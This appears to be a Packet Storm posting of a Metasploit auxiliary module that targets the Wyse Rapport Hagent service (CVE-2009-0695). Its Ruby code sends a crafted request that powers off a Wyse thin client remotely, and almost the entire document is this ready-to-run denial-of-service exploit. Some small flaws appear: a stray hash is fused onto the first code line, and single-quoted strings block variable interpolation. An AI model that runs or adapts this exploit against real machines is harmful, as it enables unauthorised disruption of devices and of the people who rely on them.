This Metasploit module exploits the Wyse Rapport Hagent service and causes a remote power cycle.
22351b9d23464102ba3b26074487f1ff569c07be9c592ad7cff3d5dd6f17f981require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Machine Remote Power off (DOS)',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service and cause
remote power cycle (Power off the wyse machine remotely).
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => 'it.solunium@gmail.com',
'Version' => '$Revision: 14976 $',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
['US-CERT-VU', '654545'],
['URL', 'http://snosoft.blogspot.com/'],
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 13 2012'
))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
# Connect to the target service
print_status("Connecting to the target #{rhost}:#{rport}")
if connect
print_status("Connected...")
end
# Parameters
genmac = "00"+Rex::Text.rand_text(5).unpack("H*")[0]
craft_req = '&V52&CI=3|'
craft_req << 'MAC=#{genmac}|#{rhost}|'
craft_req << 'RB=0|MT=3|'
craft_req << '|HS=#{rhost}|PO=#{rport}|'
craft_req << 'SPO=0|'
# Send the malicious request
sock.put(craft_req)
# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: #{resp}")
disconnect
if not resp
print_error("No reply from the target, this may not be a vulnerable system")
return
end
if resp == '&00'
print_status("#{rhost} execute command succefuly & power off.")
return
end
#Exeptions
rescue ::Rex::ConnectionRefused
print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")
rescue ::Rex::HostUnreachable
print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")
rescue ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")
rescue ::Errno::ECONNRESET, ::Timeout::Error
print_status("#{rhost} not responding.")
end
end
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed